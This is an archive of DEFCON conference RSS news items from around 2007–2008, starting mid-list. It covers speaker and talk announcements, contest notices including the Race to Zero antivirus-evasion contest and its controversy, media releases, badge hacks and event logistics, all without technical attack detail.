Melvin, Andrew Weidenhamer Demonstration of Hardware Trojans Fouad Kiamilev, Ryan Hoover WhiteSpace: A Different Approach to JavaScript Obfuscation Kolisar Flux on: EAS (Emergency Alert System) Matt "DCFLuX" Krick Taking Back your Cellphone Alexander Lash Feed my Sat Monkey Major Malfunction Sniffing Cable Modems Guy Martin The World of Pager Sniffing/Interception: More Activity than one may suspect NYCMIKE New Tool for SQL Injection with DNS Exfiltration Robert Ricks Free Anonymous Internet Using Modified Cable Modems Blake Self, Durandal Evade IDS/IPS Systems using Geospatial Threat Detection Ryan Trost The Death Envelope: A Medieval Solution to a 21st Century Problem Matt Yoder

==> First round of DEFCON 16 speakers selected!

https://www.defcon.org/defconrss.xml The first round of speakers have been selected for DEFCON 16, and it looks like we have a great lineup going! The selection process is coming along nicely and we should have the next batch of speakers online by the middle of next week. Here are the titles and speakers for the talks so far, alpha by speaker: Time-Based Blind SQL Injection using heavy queries: A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool Chema Alonso, Jos Parada VulnCatcher: Fun with Vtrace and Programmatic Debugging atlas Owning the Users with Agent in the Middle Jay Beale The emergence (and use) of Open Source Warfare Peter Berghammer What To Do When Your Data Winds Up Where It Shouldn't Don Blumenthal Generic, Decentralized, Unstoppable Anonymity: The Phantom Protocol Magnus Brding Bypassing pre-boot authentication passwords by instrumenting the BIOS keyboard buffer (practical low level attacks against x86 pre-boot authentication software) Jonanthan Brossard Building a Real Session Layer D.J. Capelis Hacking E.S.P. Joe Cicero, Michael Vieau Climbing Everest: An Insider's Look at one state's Voting Systems Sandy Clark "Mouse" Could Googling Take Down a President, a Prime Minister, or an Average Citizen? Greg Conti Next Generation Collaborative Reversing with Ida Pro and CollabREate Chris Eagle, Tim Vidas Ask EFF: The Year in Digital Civil Liberties Panel Kevin Bankston, Eva Galperin, Jennifer Granick, Marcia Hofmann, Corynne McSherry, Kurt Opsahl Panel: Hacking in the Name of Science Tadayoshi Kohno, Jon Callas, Alexei Czeskis, Dan Halperin, Karl Koscher de-Tor-iorate Anonymity Nathan Evans, Christian Grothoff Nmap: Scanning the Internet Fyodor BSODomizer Joe "Kingpin" Grand, Zoz Satan is on my Friends list: Attacking Social Networks Nathan Hamiel, Shawn Moyer A Hacker Looks at 50 G. Mark Hardy War Ballooning-Kismet Wireless "Eye in the Sky" Rick Hill The Death of Cash: The loss of anonymity and other dangers of the cash free society Tony Howlett Intercepting Mobile Phone/GSM Traffic David Hulton, "Skyper" Ham For Hackers - Take Back the Airwaves JonM Career Mythbusters: Separating Fact from Fiction in your Information Security Career Lee Kushner, Mike Murray Developments in Cisco IOS Forensics "FX" Felix Lindner Good Viruses. Evaluating the Risks Dr. Igor Muttik Brain Games: Make your own Biofeedback Video Game Ne0nRain Joe "Kingpin" Grand VoIPER: Smashing the VoIP stack while you sleep N.N.P. Hacking OpenVMS Christer berg, Claes Nyberg, James Tusini 365-Day: Active Https Cookie Hijacking Mike Perry Malware Detection through Network Flow Analysis Bruce Potter The true story of the Radioactive Boyscout: The first nuclear hacker and how his work relates to Homeland Security's model of the dirty bomb Paul F. Renda CAPTCHAs: Are they really hopeless? (Yes) Mike Spindel, Scott Torborg Living in the RIA World Alex Stamos, David Thiel, Justine Osborne Xploiting Google Gadgets: Gmalware and Beyond Tom "strace" Stracener, Robert "Rsnake" Hansen TBA Marc Weber Tobias How to make Friends & Influence Lock Manufacturers Schuyler Towne, Jon King Compliance: The Enterprise Vulnerability Roadmap Weasel Mobile Hacker Space Thomas Wilhelm To read more about these talks, go to the speaker page at http://www.defcon.org/html/defcon-16/dc-16-speakers.html!

==> First Submissions in for DEFCON 16 Artwork Contest

https://www.defcon.org/defconrss.xml You can check out the first few submissions to the Artwork Contest on pics.defcon.org at this URL: https://pics.defcon.org/showgallery.php?cat=532

==> Call for Papers Closed/Speaker Selection has begun!

https://www.defcon.org/defconrss.xml The time has come to close the DEFCON 16 CFP. Speaker Selection is now underway, and updates to the Speaker list will be frequent as they are chosen. Keep your eyes on the speaker page, the schedule page, and subscribe to the RSS Feed to stay apprised of speaker announcements as they occur! Speaker Page: https://www.defcon.org/html/defcon-16/dc-16-speakers.html Schedule Page: https://www.defcon.org/html/defcon-16/dc-16-schedule.html RSS Feed: https://www.defcon.org/html/defcon-16/dc-16-speakers.html

==> DEFCON 16 CFP Open through the weekend!

https://www.defcon.org/defconrss.xml For all you last minute stragglers and super busy folks, we are keeping the Call for Papers open through Monday the 19th. Get on it and send that submission to talks at defcon dot org! https://www.defcon.org/html/defcon-16/dc-16-cfp-form.html

==> Mystery Challenge Registration Challenge Open!

https://www.defcon.org/defconrss.xml LosT is working his devious magic again with the LosT @ Con Mystery Challenge! There is a Pre-Reg Challenge currently open, and you can find instructions at https://forum.defcon.org/showthread.php?t=9357. What is the Mystery Challenge you may ask...? From mysterychallenge.org The mystery challenge is just that- a mystery. Details of the contest are not given until the contest starts. So take the dare, and enter a contest where you are flying blind. So you heard about the challenge, and think you can compete? Search for hints and clues carefully, even prior to Defcon. Suggested Skillset for success: -Physical security (Lockpicking, literal hacking, etc) -Electronics (reading schematics, breadboard prototyping, etc) -Puzzle and Riddle Skills -Coding, networking, hacking... -???

==> Call for Papers Closing Soon

https://www.defcon.org/defconrss.xml You've only got a few days left to submit your groundbreaking research to the DEFCON Call for Papers. Go to https://www.defcon.org/html/defcon-16/dc-16-cfp-form.html and get your submission in for the chance to give a talk at DEFCON 16!

==> DEFCON 16 Capture the Flag Qualification Announcement

https://www.defcon.org/defconrss.xml Kenshoto will be back this year bringing all out cyber-warfare to DEFCON 16. The qualification round for this year's Capture the Flag contest has been officially announced. From the DEFCON Forums: Deputy Director of Homeland Security, Dr. Kenneth Shoto today announces a call to cyber-ninjas everywhere to sign up for his annual fight-to-the-death qualifying competition for the Defcon Capture the Flag (CtF) contest. The qualifying competition will start at 10PM on Friday, May 30th and end at 10PM on Sunday, June 1st. Find out more at https://forum.defcon.org/showthread.php?t=9352 or http://kenshoto.allyourboxarebelongto.us:1337/

==> Race to Zero and Dan Kaminsky on CBC Radio

https://www.defcon.org/defconrss.xml The buzz concerning the new unofficial Race to Zero Contest at DEFCON 16 just keeps on building. Dan Kaminsky provides his thoughts on the mounting controversy in an interview with Search Engine, a Canadian public radio program. Check it out here:http://podcast.cbc.ca/mp3/searchengine_20080508_5692.mp3

==> pics.defcon.org is Back!

https://www.defcon.org/defconrss.xml After a hiatus due to an XSS vulnerablity, The DEFCON pics site is back up and running! Don't hesitate to head on over and upload your favorite photos and videos from past DEFCON conventions!

==> Race to Zero Makes Headlines

https://www.defcon.org/defconrss.xml The Race-to-Zero anti-virus challenge was announce scarcely a week ago, and already the controversy surrounding it has bubbled all the way up to Wired. The contest's basic premise is that competitors will be given sample virus code and rewarded for modifying that code in such a way that it defeats common AV products. AV vendors have made their discomfort with the idea clear, with various spokesmen for the industry voicing concern about the creation of new threats to existing AV products. Contest organizers have countered that the contest is categorically not about creating new virii, rather it is about demonstrating the speed with which currently blocked virii can be modified to defeat current virus-blocking software. While it's important to note that while the contest will be happening at this year's DEFCON, it is not an official DEFCON contest. To learn about the contest from its creators and organizers, please check their website at www.racetozero.net. Links: http://www.racetozero.net/ http://blog.wired.com/27bstroke6/2008/04/hacker-challenge.html http://www.infoworld.com/article/08/04/28/Security-vendors-slam-Defcon-virus-contest_1.html Go to https://forum.defcon.org/forumdisplay.php?f=419 to chime in on the controversy

==> DEFCON 16 Artwork Contest Call for Submissions

https://www.defcon.org/defconrss.xml Whip out your favorite medium and get to creating, because the official DEFCON 16 Art Contest is now underway! This years contest is a bit different from previous years, and will run now to June 15, 2008. Go to http://www.defcon.org/html/defcon-16/dc-16-artwork-contest.html

==> New Contest! The Race to Zero

https://www.defcon.org/defconrss.xml Check out this new contest brewing for DEFCON 16! From the DEFCON Forums: The Race to Zero involves contestants being given a sample set of viruses and malcode to modify and upload through the contest portal. The portal passes the modified samples through a number of antivirus engines and determines if the sample is a known threat. The first team or individual to pass their sample past all antivirus engines undetected wins that round. Each round increases in complexity as the contest progresses. Further details are available here: http://www.racetozero.net/

==> DEFCON 16 Black & White Ball Call for Talent

https://www.defcon.org/defconrss.xml This is the Official CALL FOR TALENT : This year the ballroom will lead a double life . By day: the room will be a chillout/break out room complete with wifi By night: the room will transform into the black and white ball complete with dance floor, lights,headlining acts and a bar. This said we are currently taking all submissions for DJ/acts for the chillout/breakout . and have a few slots for black and white ball . some of the styles we are looking for are : drum n bass trance breaks electro industrial If you are interested in performing please contact : blackandwhitedjs@gmail.com

==> DEFCON 16 Call for Papers Now Open!

https://www.defcon.org/defconrss.xml That's right! It's time again to submit your hacktastic discoveries to be considered as a DEFCON 16 talk! New and interesting research is always welcomed in the realm of security, hardware hacking, social engineering, lockpicking, and anything else you can modify, bypass or reverse engineer. Out of the box thinking is what we're after... Go to the CFP form and submit!.

==> DEFCON 15 [Video] Podcast now online.

https://www.defcon.org/defconrss.xml The Defcon 15 Video Podcast is now online. If you didn't make it, or missed the speaker you wanted to see here is your chance to download and watch the presentations any time. http://www.defcon.org/podcast/defcon-15-video.rss Supporting Materials will be online at: https://www.defcon.org/html/links/defcon-media-archives.html#dc_15

==> DEFCON 15 [Audio] Podcast now online

https://www.defcon.org/defconrss.xml The Defcon 15 Audio Podcast is now online. If you didn't make it, or missed the speaker you wanted to see here is your chance to download and hear the presentations when you want. http://www.defcon.org/podcast/defcon-15-audio.rss Supporting Materials will be online at: https://www.defcon.org/html/links/defcon-media-archives.html#dc_15

==> Tiger Team with Pyr0, long time DEF CON Goon(tm)

https://www.defcon.org/defconrss.xml Tiger Team is a new series on TruTV (formerly CourtTV) featuring a familiar face from DEFCON, Luke McOmie aka pyr0. From wikipedia: The show follows a "tiger team" of Chris Nickerson, Luke McOmie, and Ryan Jones, which is hired to infiltrate organizations with the objective of testing their weaknesses to electronic, psychological, tactical, and physical threats. Attacks executed on organizations in this television show include social engineering, wired and wireless hacking, and physically breaking into buildings. The television show's first two episodes aired Tuesday, December 25, 2007 at 11:00 pm ET and 11:30 pm ET. The first episode is available on TruTV's website in streaming flash format. TruTV Feedback: http://www.trutv.com/contact/feedbackform.asp?amp;subject_id=148&start=true

==> Join the DEFCON LinkedIn Group

https://www.defcon.org/defconrss.xml Join the DEFCON LinkedIn Group! We have created a DEF CON group on LinkedIN, if you already have an account at LinkedIN please join us. We don't collect email addresses so there is no easy way to pre-approve people, just use the following link to request membership. http://www.linkedin.com/e/gis/47798/109B061719DC

==> Pre-DEFCON 16

https://www.defcon.org/defconrss.xml It's beginning already... Check out the Pre-DEFCON 16 Discussions in the DEFCON Forums. If you want to get involved, start here!

==> DT Speaks Out On the "To Catch a Hacker" Scandal

https://www.defcon.org/defconrss.xml The media storm that followed the NBC producer fleeing DEFCON included a lot of opinions, but none of them came from the DEFCON staff itself. DT recently contributed a piece to the Thinkernet blog at InternetEvolution.com. It's an interesting piece about the significance of the event and some of the lessons that the media can take from all the hoopla.

==> DEFCON FORUMS now support user blogs

https://www.defcon.org/defconrss.xml The DEFCON foums (forum.defcon.org) now supports projects and blogs. We have licensed the blog http://www.vbulletin.com/features_blog.php, tool, and anyone with a forum account can now create a blog. We'll be doing more with this in the future, but for now we are encouraging people to create accounts and play with it. If it works we'll keep it, if not we'll look for other software to try. We've also licensed Project Tools (http://www.vbulletin.com/features_project.php) that everyone can use to plan DC Groups projects, events at the con, or their latest hacking project. If you're a forum member, we hope you'll take a little time to try out the new features. If you're not, here's hoping this helps you decide to join us.

==> DEFCON 15 Badge finalist in Design Challenge

https://www.defcon.org/defconrss.xml The Defcon 15 badge is a finalist in the Freescale Semiconductor Black Widow $10,000 Design Challenge. Freescale selected the ten finalists from a field of more than 775 participants. Each submission was judged on creativity, design efficiency, technical complexity, number of Freescale devices used, and overall application innovation and usefulness.

==> Photos of DC 15 Badge Hacks

https://www.defcon.org/defconrss.xml Check out these photos of the badge hacking and final hacks at DEFCON 15. For badge source code, video of the hacks, and source of selected hacks, check out Joe Grand's badge page at: http://www.grandideastudio.com/portfolio/index.php?amp;id=1&prod=54

==> DEFCON Network Survival Guide

https://www.defcon.org/defconrss.xml It's a little late, but it's never to early to start planning for next year. If you must get online at DEFCON, here's a little guide to help keep you from getting completely owned. >From The Register: "..Defcon, the most bacchanal of security conferences and perhaps the single largest gathering of technically adept pranksters. Now is the perfect time to map out a strategy for keeping emails private and making sure your system doesn't get ransacked by the scowling kid with the nose ring and jet-black hair."

==> The Traveling Terabyte Project

https://www.defcon.org/defconrss.xml Many of you know Deviant Ollam, from his extensive involvement in the Lockpick Village and his running of the Beverage Cooling Contest, as well as his new "Titanium Chef" and "guess the Flesh" contests at the Toxic BBQ this year. We came across a story about one of his projects and though we'd share. >From tgdaily.com: A New Jersey network engineer is on a mission to send some love and care of the digital kind to Americans stationed overseas. Going by his hacker handle Deviant Ollam, hes been sending out hard drives filled with popular movies, television shows and music for over a year. Dubbed the Traveling Terabyte Project (TTB), the drives have seen action in war-torn countries and one set is now making a small contingent of Marines very happy in the former Soviet republic of Tajikistan. Photos at: http://www.tgdaily.com/index.php?option=com_content&task=blogsection&id=18&Itemid=41&slideshow=20070920

==> Kingpin: far from soft, reprezentin' l0pht.

https://www.defcon.org/defconrss.xml This little slice of gangsta was part of the winning Badge Hacking Contest submission by Team Osogato. This rap song was created by The Brothers Grimm and based on Kingpin's "Ode to the DEFCON 15 Badge" poem printed in the conference program. Played at the DEFCON 15 Awards Ceremony on Sunday afternoon. Thanks to Kingpin for posting this on the media server at pics.defcon.org. If you've got any pictures or media from DEFCON, please consider sharing it with the DC family at pics.defcon.org.

==> DEFCONbot video

https://www.defcon.org/defconrss.xml Ever wonder what it takes to compete in the DEFCONbot shootout? Check out some fascinating behind-the-scenes video from a team that had a sentry gun in this year's competition at the Burnt Popcorn blog. For more information about DC 15's DEFCONbots winners or data on past competitions, be sure to visit defconbots.org.

==> Call for DEFCON 15 photos

https://www.defcon.org/defconrss.xml If you have pictures of this DEFCON 15 (or any previous DEFCON) you'd like to share, please upload them to https://pics.defcon.org We're trying to create a visual record of all the shows and your help is appreciated. Just create an account and start uploading pictures and videos!

==> DEFCON media archives updated

https://www.defcon.org/defconrss.xml The DEFCON media archives have been updated with slides, white papers and extras for DEFCON 15 presentations. Come check them out, and stay tuned - we'll be adding audio and video from DEFCON 15 as soon as it's ready.

==> DEFCON In The News

https://www.defcon.org/defconrss.xml Many interesting things happened at this year's DEFCON, from the sensational hackable badge by Joe Grand to the eye-opening talk by Zac Franken on access control reader (in)security. We blew the undercover reporter's cover, and we found out that a kid can bump a "bump-proof" deadbolt. We even married two Feds. What a year! Here are just a few of the headlines arising from DEFCON 15: http://www.wired.com/politics/security/news/2007/08/medeco Medeco Readies Assembly-Line Fix for DefCon Lock Hack http://www.computerworld.com/action/article.do command=viewArticleBasic&articleId=9029080 $10 hack can unlock nearly any office door http://blog.wired.com/27bstroke6/2007/08/i-married-a-fed.html I Married a Fed at DefCon http://www.youtube.com/watch?v=nCvmkxO5hoQ Michelle Madigan Video: Dateline Reporter Uncovered At DEFCON 2007. http://weblog.infoworld.com/zeroday/archives/2007/08/defcon_diary_th.html Defcon diary: The real story

==> A Word from DEFCON 15 Badge Creator Joe Grand!

https://www.defcon.org/defconrss.xml Joe Decided to drop us a line and clue send us some info on whats going on with the badges AFTER the con. We loved the badges this year and apparently we arent the only ones who found them awesome. >From Joe Grand "You've probably noticed that people are still going *nuts* over the badges. That's a really awesome feeling and hopefully there will be some of the 40 people who took components and development kits coming back next year with some radical hacks. Here are some pictures I took of the Black Hat and DEFCON conferences (and badge hacking): http://www.flickr.com/photos/joesmooth/sets/72157601295119952/ and here: http://www.flickr.com/photos/joesmooth/sets/72157601302838516/ The badges have been selling like hot cakes on eBay: http://search.ebay.com/defcon-15 Take a look at the completed listings, too, to see the high bidders! Also, there were TONS of blog and news reports about the badge. You've probably read most of them, but here are the ones I liked the best: * Hack-a-Day, August 2, 2007, http://www.hackaday.com/2007/08/02/the-defcon-badge * The Register, The romance and mystery of a good hack, August 6, 2007, http://www.theregister.co.uk/2007/08/06/defcon_final/ * The Inquirer, Defcon ID badge comes with its own technical manual, August 3, 2007 http://www.theinquirer.net/default.aspx?article=41436 * boingboing, Defcon's hackable badges, August 3, 2007, http://www.boingboing.net/2007/08/03/defcons_hackable_bad.html * Wired, Threat Level, Badge Hack at DefCon, August 3, 2007 http://blog.wired.com/27bstroke6/2007/08/badge-hack-at-d.html * Makezine.com: Defcon 15 round up, August 5, 2007, http://www.makezine.com/blog/archive/2007/08/defcon_15_round_up.html * Makezine.com: Hackers on a Plane - Defcon, August 7, 2007, Http://www.makezine.com/blog/archive/2007/08/hackers_on_a_plane_defcon_1.html * Gizmodo, DefCon Badge Hacked in 10 Minutes, August 3, 2007, http://gizmodo.com/gadgets/defcon/defcon-badge-hacked-in-10-minutes-285998.php I'll be putting up a webpage with complete badge development info, badge hacking contest results/hacks/source, etc. in the next week or so. It will be directly accessible from the main www.grandideastudio.com site for a while. Details on the winning badge hacking contest entry from Team Osogato can be found here: http://www.osogato.com/hacks This was the only entry out of seven that combined hardware and firmware modifications - they hacked the badge into a line-level meter for under $10 that used the LED matrix to display the peak audio levels of an audio signal fed into one channel of the A/D. The two capacitive touch buttons are used to adjust the input levels of the signal and there are even three shades of "greyscale" for a fading effect on the LEDs. For the icing on the cake, the team worked with The Brothers Grimm from Michigan (http://www.myspace.com/CompleteError) to create a rap song based on my poem that I wrote for the DC15 program (on page 3). What an honor! The song is freely available at the Team Osogato link above and step-by-step hack details are forthcoming. Hope you guys are recovering! Joe"

==> DEFCON 15 Supports EFF! Dunk Tank Results!

https://www.defcon.org/defconrss.xml This year the Dunk Tank raised $4,700 We matched that and added our contribution to reach a total of $12,000 to the EFF! We know they will put it to good use with their hard work! For the past 17 years, EFF has been proud to take on the hard cases to ensure that your liberty is not sacrificed unnecessarily. They are responsible for loads of support for Tor, stopping RIAA lawsuits, Privacy Issues, etc. You don't have to wait till the next Dunk tank@ DEFCON 16 to support them! Join EFF today! They work all year round so support them by donating to EFF at http://secure.eff.org/. Spread the word to your friends and family. Short goal list of current EFF Projects : Pull Congress Back Into the Wiretapping Fight! Repeal the REAL ID Act! Reform the PATRIOT Act! Support the FAIR USE Act! Fight the Justice Department's Copycrime Stop the SPY Act! Stop the Broadcasting Treaty Flip-Flop! CA Alert - Keep RFIDs out of State IDs! Don't Let Congress Shackle Digital Music! Tell Congress to Support E-Voting Reform! make sure every counts! Improve the Freedom of Information Act! Don't Let Cable Companies Ratchet Up Restrictions!.

==> theSummit at DEF CON 15

https://www.defcon.org/defconrss.xml Want to help support the EFF and Hacker Foundation? Would you like to meet with authors of those security books you have been reading all year long? Craving some live nerdcore? Kill three birds with one stone! Thursday August 2, 2007 @ 9:00PM Vegas 2.0 presents "theSummit" a fund raiser with a twist! Meet with computer security guru, listen to some great live music AND support two great causes at the same time! Meet up with us in the Riv Skyboxes this Thursday, tickets are $35 at the door. Need more details? Visit http://www.vegassummit.org

==> DEFCON 15 FINAL Schedule now on-line!

https://www.defcon.org/defconrss.xml We are proud to present the FINAL schedule of speakers and events for DEFCON 15! This year DEFCON has grown, and is offering the largest line of up speakers ever - thanks to all the new space available at our new venue, the Riviera Hotel. Because of this there are also more contests. There is an overwhelming amount of things to participate in. Pending Natural Disasters, Emergency, Missing, kidnapped or Canceled speakers this is our final schedule...well that's the intention anyway! If you are speaking or involved in the content side of things and you see a problem or something missing please let us know! See you at the show!

==> (beta) DEFCON 14 Black and White Video and Audio released!

https://www.defcon.org/defconrss.xml The video and audio from DEFCON 14 has been encoded and ready for download! There may be some minor tweaks, but all the video that is available has been encoded to iPod Video specs, H.264 and 320x240. Audio is in .mp3 192k format. We are trying to identify the artists in each hour, so if you know who they are please let us know and we'll update the file names so everyone gets proper credit. The following links will have to get you by until the complete RSS feed with iTunes and MRSS tags is complete: http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Carthsis-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Regenerator-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Jackalope-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Mind-Pop-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-Minibosses-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-2-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-3-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-4-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-5-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-6-320-517kbps.mp4 http://media.defcon.org/dc-14/music/dc-14-BandW-Ball-hour-7-320-517kbps.mp4

==> Black and White Ball Lineup Announced!

https://www.defcon.org/defconrss.xml The Black and White ball is back in effect with the following bands and DJs ready to throw down. Friday Night Black Ball Industrial/ ebm / Noize Dress: your best blacks: Bondage Rubber and Fetish Encouraged Featuring : Regenerator http://www.regenerator.net/ DJs Patrice Wintamute SailorGloom Great Scott! Catharsis Kriz Klink And more ... Saturday Night: White ball ==Geekdom Release party== Dress: Your finest stormtrooper suit, togas, bedsheets and the likes. Featuring : Miss DJ Jackalope // Jungle Chaos http://www.dj-jackalope.com/ DualCore // Live Nerdcore Set http://dualcoremusic.com; *Minibosses // NES classics http://www.minibosses.com/ DJs Rustcycle / Electronic live mix http://www.rustcycle.com Crashish // DNB Casey // psytrance Mitch Mitchem // breakbeat/electroclash * scheduling tentative All acts subject to change. please see a complete listing posted throughout DEFCON venues

==> Amateur Radio at DEFCON 15

https://www.defcon.org/defconrss.xml For all you radio geeks! 146.58 (FM Simplex) will be the unofficial Defcon 15 frequency for Amateur Radio enthusiasts.

==> Sushicon 4.0

https://www.defcon.org/defconrss.xml Wednesday, August 1st at the Sushi Factory on Tropicana will be the location for ShshiCon 4.0 right before DEFCON. Love sushi? Want to meet new people and hang out in a sake fueled pre-con ritual? Then ShshiCon is for you! Organized byGonMinusOne, check out the forums for the latest details. https://forum.defcon.org/showthread.php?t=8578

==> World Premiere of Infest Wisely to be shown at DEFCON

https://www.defcon.org/defconrss.xml This year's DEFCON Movie Night will feature the new and highly buzz-worthy film "Infest Wisely." The film is centered around the increasingly less science-fictional world of commercial nanotechnology and it's been described this way: "Infest Wisely asks what would happen if Critical Mass teamed up with the geeks from DEFCON to stop commercialized nanotech from taking over our bodies and the world." It's a feature length movie in seven episodes, each with different directors but all written by novelist Jim Munroe, who will be our special guest for the screening. As always, there's no charge - come join us and support cinema licensed under the Creative Commons. For more information about the film, you can check out it's website. http://www.infestwisely.com/

==> DEFCON 15 Schedule now on-line!

https://www.defcon.org/defconrss.xml We are proud to present the schedule of speakers and events for DEFCON 15! DEFCON This year DEF CON has grown, and is offering the largest line of up speakers ever - thanks to all the new space available at our new venue, the Riviera Hotel. Because of this there are also more contests. There is an overwhelming amount of things to participate in. Please note that this is the first schedule version and is not final. As speakers and contests finalize their information the schedule will be updated up to the last minute. If you re speaking or involved in the content side of things and you see a problem or something missing please let us know!

==> New ToxicBBQ Contests!

https://www.defcon.org/defconrss.xml From Deviant: "There are two contests/events that I'll be running at this year's ToxicBBQ, both of which involve the "Exotic Meat" theme that I tend to focus upon year after year. I have a web page up online with full details, rules, info, etc... http://deviating.net/toxicbbq" -=[ Titanium Chef ]=- Cost to Participate: $40 per team Prizes for Winners: OiNK invite for each team member, secret grand prize, refund of entry fee, extreme bragging rights and Free giveaways of fun stuff to all participants DefCon Forums Sign-up Thread: https://forum.defcon.org/showthread.php?t=8367 Teams of up to three individuals will put their heads together and engage in heated battle to concoct a delicious dining experience focused around a secret theme ingredient. These hacker chefs will have both their culinary skills and their organizational abilities put to the test in this challenging event. All participants will gather together a few hours before the Toxic BBQ in order to witness the revealing of the event's secret ingredient, then they will disperse in order to gather supplies, reach Sunset Park, and prepare their food for the judges. Whose cuisine will reign supreme? Will opponents' grill-fu be stronger than you? Participate and find out! -=[ Guess The Flesh ]=- Cost to Participate: $10 per person Prizes for Winners: OiNK invite for first three people to correctly identify all meats. Free giveaways of fun stuff to all participants DefCon Forums Sign-up Thread : https://forum.defcon.org/showthread.php?t=8365 Have you ever thought to yourself, "Gee, i wish i could dine on the meat of nearly every kind of beast to walk the earth... but I don't own many high-powered firearms, i don't have the money to travel the world, and no government in their right mind would issue me a hunting license?" Well, now your dreams can become a reality. For less than the cost of what passes for a movie and popcorn nowadays, you can have a sample platter featuring eight meats that you aren't likely to see at the supermarket. However, instead of just cooking and randomly giving out samples willy-nilly, this year i have something new planned. I intend to prepare morsels of these meats and plate them in a way that they are not immediately identifiable or distinguishable from one another. Those who are eager to try some new flavors -- and those who think their pallets are up to the challenge -- can take a whack at identifying these various animals by taste and texture alone.

==> Be Prepared! Update

https://www.defcon.org/defconrss.xml The be prepared section of the DEFCON 15 site has been updated! Check it out.

==> Las Vegas concerts for Black Hat and DEFCON time frame

https://www.defcon.org/defconrss.xml From IrishMASMS on the DEFCON forums comes this helpful post: Las Vegas concerts for Black Hat & DEFCON time frame Some out of town folks hit me up asking about concerts around town during this year's Black Hat andDEFCON. I took a quick look on http://pollstar.com/ and http://www.jambase.com/ for what might be interesting. YMMV, though I thought sharing is caring. Fri 07/27/07 Violent Femmes Hard Rock Hotel and Casino Fri 07/27/07 Jonny Lang House Of Blues Sat 07/28/07 Tesla House Of Blues Sat 07/28/07 Rush MGM Grand Garden Arena Wed 08/01/07 John Lee Hooker Jr. Santa Fe Station Hotel & Casino Thu 08/02/07 John Lee Hooker Jr. Boulder Station Hotel & Casino Fri 08/03/07 Godsmack The Pearl Concert Theater At Palms Sat 08/04/07 Buckcherry, Hinder, Papa Roach The Pearl Concert Theater At Palms Sun 08/05/07 Against All Authority, Reel Big Fish / Less Than Jake, Streetlight Manifesto House Of Blues Mon 08/06/07 "Sounds Of The Underground": Amon Amarth, Chimaira, Every Time I Die, GWAR, Heavy Heavy Low Low, Job For A Cowboy, Necro, Shadows Fall , The Devil Wears Prada, The Number Twelve Looks Like You - House Of Blues Sat 08/11/07 The Fixx The Club @ Cannery Casino As for venues, the Hard rock sucks. House of Blues is one of the best in town. MGM Grand is ok, but the sound quality in the arena can be bleep in spots. The Pearl is the brand new venue in town, good luck getting tickets. The Station casinos are not bad venues, and I think those are free shows. The Cannery Casino I have never been to, so I can not say - and there is no review posted on www.yelp.com yet for me to reference. HTH!

==> Scavenger Hunt! Advice from the Winners!

https://www.defcon.org/defconrss.xml Scavenger Hunt! Advice from the Winners!! Free advice courtesy of hackajar with Vegas 2.0 Here's a quick list of things you will need to be fully geared up, if competing. I kinda wish we had something like this three years ago! 1.) Money - we spent ~$500 each year, though some good social engineering could very well fix this 2.) Digital Camera - Judges won't know what you did, without proof! 3.) Video Camera - Sometimes a photo DOESN'T say a thousand words, but motion video does! 4.) Transportation - Sometimes you have to go on recon, we always paid extra to have a car in front of valet for those quick runs 5.) Room at Hotel - Need somewhere to build a 30ft straw or host a geek girl strip off, your best bet is in a local room 6.) Printer - Don't ask me how many points we never got for lack of a stupid printer! 7.) Beer - It's easy to bribe goons and judges with this stuff, if you can find it. 8.) Start Early - Some items and tasks we could only do on Friday, remember things close on Saturday and Sunday, so be wise! 9.) Memorize the phrase "It's for the Scavenger Hunt" - nuff said I'm sure I'm missing something else in there, please add to my list! -Vegas 2.0 Defcon 14 Scav Hunt Winners

==> DEFCON 15 CFP is now closed!

https://www.defcon.org/defconrss.xml DEFCON 15 CFP is now closed! We are in the process of making our final selections and will start to fill in the online schedule soon! We will notify you of the status of your submission by July 1st. If you have not heard from us by then please email talks[at]defcon[dot]org. If you were not accepted don't be discouraged, we have recieved many many quality submissions this year but we can't accept them all. As you know we are in the process of expanding to accept more and more talks each year. There is still plenty you can do to get involved, join the forums, read up on our contests, even just take some cool pictures! pics.defcon.org is now live for use.The pics software is integrated with the defcon forums, so if you already have an account there you automatically have an account on https://pics.defcon.org/ Do your Photoshop skilz 0wnzor?! DEFCON Art Contest is currently open! Submit your art by June 25, to be used online and to be included in the DEFCON 15 program. We are looking for a Web Banner, Key Card, T-Shirt, Wallpaper! If you win you could win free admission and cash to be used at the DEFCON Swag booth! https://www.defcon.org/html/defcon-15/dc-15-forms/DC15-Artwork-Contest-Guidelines.pdf

==> New "Be Prepared"- Lock Picking for Sport and Amusement

https://www.defcon.org/defconrss.xml Lock Picking for Sport and Amusement DEFCON is a great place to learn all sorts of new skills - the skill of lockpicking is no exception. This year's Con will again have a "Lockpicking Village" - a fantastic event with all kinds of presentations, practice locks, sample tools and general education. We want everyone who's interested to check it out, but we want you to be careful and safe as well. Be sure to consult your state and local laws about possession of locksmith's tools. Staying in compliance with the applicable laws is, of course, your responsibility. When traveling, it's not a good idea to put tools of this nature in your carryon. While they're unlikely to cause any problems in checked baggage, those pointy little devils are very likely to be a problem in the security line. It probably ought to go without saying, but if you're making an international trip to DefCon, the scrutiny is much higher and you owe it to yourself to be thoroughly familiar with the rules and err on the side of caution. You don't need that kind of hassle. There's plenty of lockpicking knowledge and fun to be had even without your k-rad tools, so don't put yourself in a position to miss your flight. It's also an option to mail them to yourself in care of your hotel. Some hotels charge for this service, so be aware of the policies wherever you're staying. If the world of locksport is brand new to you and you're looking to get a little knowledge before the Con, you can check out Marc Weber Tobias' contributions to techblog Engadget (called The Lockdown.) More info is also available from Locksport International (lsi.com) or The Open Organization of Lockpickers ( toool.us or toool.nl for Dutch speakers) Link: https://www.defcon.org/html/defcon-15/dc-15-beprepared.html

==> Hackers on A Plane!

